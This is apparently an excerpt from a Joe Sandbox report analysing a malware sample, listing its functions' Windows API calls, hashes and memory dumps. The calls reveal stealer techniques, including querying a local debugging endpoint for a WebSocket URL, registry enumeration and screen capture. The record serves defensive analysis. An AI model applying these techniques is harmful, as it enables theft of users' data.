                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                            • String ID:
                            • API String ID: 2367105040-0
                            • Opcode ID: 131b16ff32799a34d4f866e08f080269730ac0cbe180f531c11698d045489514
                            • Instruction ID: 05a030673fdc29dde2ad8ba6bc52a91f5d5ad707d00f3a73c140c2cc84bc5d80
                            • Opcode Fuzzy Hash: 131b16ff32799a34d4f866e08f080269730ac0cbe180f531c11698d045489514
                            • Instruction Fuzzy Hash: 1CB1CDB1D10259AFDB20EFA4CC949EEB7BAEF48300F144569F946A7341EA309E44CB90
                            Function 006DB309 Relevance: 25.5, APIs: 20, Instructions: 451stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DB330
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB37E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB3A9
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DB3B1
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB3D9
                            • lstrlen.KERNEL32(00704C50), ref: 006DB450
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB474
                            • lstrcat.KERNEL32(00000000,00704C50), ref: 006DB480
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB4A9
                            • lstrlen.KERNEL32(00000000), ref: 006DB52D
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB557
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DB55F
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB587
                            • lstrlen.KERNEL32(00704AD4), ref: 006DB5FE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB622
                            • lstrcat.KERNEL32(00000000,00704AD4), ref: 006DB62E
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB65E
                            • lstrlen.KERNEL32(?), ref: 006DB767
                            • lstrlen.KERNEL32(?), ref: 006DB776
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DB79E
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$lstrcat
                            • String ID:
                            • API String ID: 2500673778-0
                            • Opcode ID: 99bb062419e595302dbf533c86252c32763fa6b0117fa5c135a0f0154b675b7e
                            • Instruction ID: cd06e42c206833f0f888b142504496c50ba442bf4c8e558b51cccd878549fc4f
                            • Opcode Fuzzy Hash: 99bb062419e595302dbf533c86252c32763fa6b0117fa5c135a0f0154b675b7e
                            • Instruction Fuzzy Hash: C9024D70E15206CFCB65DF65D998BAAB7F2AF44304F1A906EE4099B366D731DC42CB80
                            Function 006F3760 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 222registrystringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 006F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 006F71FE
                            • RegOpenKeyExA.ADVAPI32(?,0101BB60,00000000,00020019,?), ref: 006F37BD
                            • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 006F37F7
                            • wsprintfA.USER32 ref: 006F3822
                            • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 006F3840
                            • RegCloseKey.ADVAPI32(?), ref: 006F384E
                            • RegCloseKey.ADVAPI32(?), ref: 006F3858
                            • RegQueryValueExA.ADVAPI32(?,0101F808,00000000,000F003F,?,?), ref: 006F38A1
                            • lstrlen.KERNEL32(?), ref: 006F38B6
                            • RegQueryValueExA.ADVAPI32(?,0101F820,00000000,000F003F,?,00000400), ref: 006F3927
                            • RegCloseKey.ADVAPI32(?), ref: 006F3972
                            • RegCloseKey.ADVAPI32(?), ref: 006F3989
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                            • String ID: - $%s\%s$?
                            • API String ID: 13140697-3278919252
                            • Opcode ID: e9ac054c2c2100ce58ae6de0f7cca1164a6b492af0acb4c18883df6ef9c5a440
                            • Instruction ID: 30f6861e4f07ab3fa9c702d03747db470b76390d3d993965c47b3976deceed5d
                            • Opcode Fuzzy Hash: e9ac054c2c2100ce58ae6de0f7cca1164a6b492af0acb4c18883df6ef9c5a440
                            • Instruction Fuzzy Hash: E0918EB2E042199FCB10DFA4CD849EEB7BAFB48310F148569E609AB351D771AE41CB90
                            Function 006D90C0 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 162networkstringfileCOMMON
                            Download Yara Rule
                            APIs
                            • InternetOpenA.WININET(006FCFEC,00000001,00000000,00000000,00000000), ref: 006D90DF
                            • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 006D90FC
                            • InternetCloseHandle.WININET(00000000), ref: 006D9109
                            • InternetReadFile.WININET(?,?,?,00000000), ref: 006D9166
                            • InternetReadFile.WININET(00000000,?,00001000,?), ref: 006D9197
                            • InternetCloseHandle.WININET(00000000), ref: 006D91A2
                            • InternetCloseHandle.WININET(00000000), ref: 006D91A9
                            • strlen.MSVCRT ref: 006D91BA
                            • strlen.MSVCRT ref: 006D91ED
                            • strlen.MSVCRT ref: 006D922E
                            • strlen.MSVCRT ref: 006D924C
                              • Part of subcall function 006D8980: std::_Xinvalid_argument.LIBCPMT ref: 006D8996
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                            • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                            • API String ID: 1530259920-2144369209
                            • Opcode ID: 06b4840ff0d325bda6b1b6a1231ce65d046e0b870fe09d08aeb72b594831ebf2
                            • Instruction ID: 8ce6462f1b3c4a590131468d3f5c8e8dbbcc754039a73104a2a1dd6373757cbf
                            • Opcode Fuzzy Hash: 06b4840ff0d325bda6b1b6a1231ce65d046e0b870fe09d08aeb72b594831ebf2
                            • Instruction Fuzzy Hash: B45181B1A10209ABD710DBA8DC45FEEF7FA9F48710F14016AF605A3381DBB49A4487A5
                            Function 006F1660 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 141stringCOMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 006F16A1
                            • lstrcpy.KERNEL32(00000000,0100A860), ref: 006F16CC
                            • lstrlen.KERNEL32(?), ref: 006F16D9
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F16F6
                            • lstrcat.KERNEL32(00000000,?), ref: 006F1704
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F172A
                            • lstrlen.KERNEL32(0101EB50), ref: 006F173F
                            • lstrcpy.KERNEL32(00000000,?), ref: 006F1762
                            • lstrcat.KERNEL32(00000000,0101EB50), ref: 006F176A
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006F1792
                            • ShellExecuteEx.SHELL32(?), ref: 006F17CD
                            • ExitProcess.KERNEL32 ref: 006F1803
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                            • String ID: <
                            • API String ID: 3579039295-4251816714
                            • Opcode ID: ae68d122b64ded7e20aa2e8c3ab15a4ada84f166b41cfd02e9913faec1726a10
                            • Instruction ID: f9e81d195f0821634e97f73740f8ef1bb3da2d950c615fe2181ae92c0a2c6fb1
                            • Opcode Fuzzy Hash: ae68d122b64ded7e20aa2e8c3ab15a4ada84f166b41cfd02e9913faec1726a10
                            • Instruction Fuzzy Hash: 4651C470E1121AEFDB60EFA5CC946EEB7FAAF54340F044129E609E7351DB30AE019B94
                            Function 006EEFB0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 164stringmemoryCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EEFE4
                            • lstrcpy.KERNEL32(00000000,?), ref: 006EF012
                            • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006EF026
                            • lstrlen.KERNEL32(00000000), ref: 006EF035
                            • LocalAlloc.KERNEL32(00000040,00000001), ref: 006EF053
                            • StrStrA.SHLWAPI(00000000,?), ref: 006EF081
                            • lstrlen.KERNEL32(?), ref: 006EF094
                            • lstrlen.KERNEL32(00000000), ref: 006EF0B2
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 006EF0FF
                            • lstrcpy.KERNEL32(00000000,ERROR), ref: 006EF13F
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$AllocLocal
                            • String ID: ERROR
                            • API String ID: 1803462166-2861137601
                            • Opcode ID: 0994d46155e9216594e60d8edba8c46b6312ff90afc896b1148caa5bbcf844fc
                            • Instruction ID: 51d43d04f9ab6ca1f463a97d1bfea8fd5e2a7cdc585090490537f687868c0e6b
                            • Opcode Fuzzy Hash: 0994d46155e9216594e60d8edba8c46b6312ff90afc896b1148caa5bbcf844fc
                            • Instruction Fuzzy Hash: 6651C0B1A112569FCB71AF76DC59AAE77E6EF50310F08816DF84A9B352DA30DC018B90
                            Function 006DA010 Relevance: 18.3, APIs: 12, Instructions: 251stringlibraryCOMMON
                            Download Yara Rule
                            APIs
                            • GetEnvironmentVariableA.KERNEL32(01018C38,00909BD8,0000FFFF), ref: 006DA026
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006DA053
                            • lstrlen.KERNEL32(00909BD8), ref: 006DA060
                            • lstrcpy.KERNEL32(00000000,00909BD8), ref: 006DA08A
                            • lstrlen.KERNEL32(00704C4C), ref: 006DA095
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DA0B2
                            • lstrcat.KERNEL32(00000000,00704C4C), ref: 006DA0BE
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DA0E4
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006DA0EF
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006DA114
                            • SetEnvironmentVariableA.KERNEL32(01018C38,00000000), ref: 006DA12F
                            • LoadLibraryA.KERNEL32(010055A8), ref: 006DA143
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                            • String ID:
                            • API String ID: 2929475105-0
                            • Opcode ID: 85c4ac7d63c5435d940a47481e2b818446a77157f772ca6e29ac0ce5fd522d22
                            • Instruction ID: 362a335cd3eab8ef715821f5127a21008b9e070fc8edb6d9e50c760775f22190
                            • Opcode Fuzzy Hash: 85c4ac7d63c5435d940a47481e2b818446a77157f772ca6e29ac0ce5fd522d22
                            • Instruction Fuzzy Hash: F291E170E18A019FD730AFE5DC44AA737A7EB94704F44412AE5458B3A2EFB5DD40DB82
                            Function 006EC840 Relevance: 18.2, APIs: 12, Instructions: 209stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EC8A2
                            • lstrcpy.KERNEL32(00000000,006FCFEC), ref: 006EC8D1
                            • lstrlen.KERNEL32(00000000), ref: 006EC8FC
                            • lstrcpy.KERNEL32(00000000,00000000), ref: 006EC932
                            • StrCmpCA.SHLWAPI(00000000,00704C3C), ref: 006EC943
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen
                            • String ID:
                            • API String ID: 367037083-0
                            • Opcode ID: 74376fee1fbfb6687ea25458719083bca77ab7f345361f4cc01eb061efa60204
                            • Instruction ID: f1fc2d0e5f68635cff0f799ef439fe16c82fd2ab33e66cdf4e92cdc9836ea3ec
                            • Opcode Fuzzy Hash: 74376fee1fbfb6687ea25458719083bca77ab7f345361f4cc01eb061efa60204
                            • Instruction Fuzzy Hash: 8C61A3B1E1235A9FDB10EFBAC945AEE7BBAAF15310F044569E841E7341D73489028B90
                            Function 006F41E0 Relevance: 16.7, APIs: 11, Instructions: 177COMMON
                            Download Yara Rule
                            APIs
                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,006F0CF0), ref: 006F4276
                            • GetDesktopWindow.USER32 ref: 006F4280
                            • GetWindowRect.USER32(00000000,?), ref: 006F428D
                            • SelectObject.GDI32(00000000,00000000), ref: 006F42BF
                            • GetHGlobalFromStream.COMBASE(006F0CF0,?), ref: 006F4336
                            • GlobalLock.KERNEL32(?), ref: 006F4340
                            • GlobalSize.KERNEL32(?), ref: 006F434D
                            Memory Dump Source
                            • Source File: 00000000.00000002.2219500390.00000000006D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.2219485273.00000000006D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000707000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000075E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000766000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219500390.0000000000908000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219654051.000000000091A000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.000000000091C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000AAF000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000B8C000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BB7000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BBE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219667784.0000000000BCD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2219901613.0000000000BCE000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220004561.0000000000D6F000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2220018603.0000000000D70000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                            • String ID:
                            • API String ID: 1264946473-0
                            • Opcode ID: 692ee66dd6c45a56cdb9115b7e00415ca1dfca4cde96201a2d553d2ae3168805
                            • Instruction ID: 79067813915dc74c3656d7e717348ff4f6075bc05ea650a71dcfa1ba975b7403
                            • Opcode Fuzzy Hash: 692ee66dd6c45a56cdb9115b7e00415ca1dfca4cde96201a2d553d2ae3168805
                            • Instruction Fuzzy Hash: ED513FB5A24209AFDB10DFB4DC85AEFB7B9EF48300F104519FA05E3251DB74AD019BA0
                            Function 006EDFA0 Relevance: 16.7, APIs: 11, Instructions: 175stringCOMMON
                            Download Yara Rule
                            APIs
                            • lstrcat.KERNEL32(?,0101F190), ref: 006EE00D
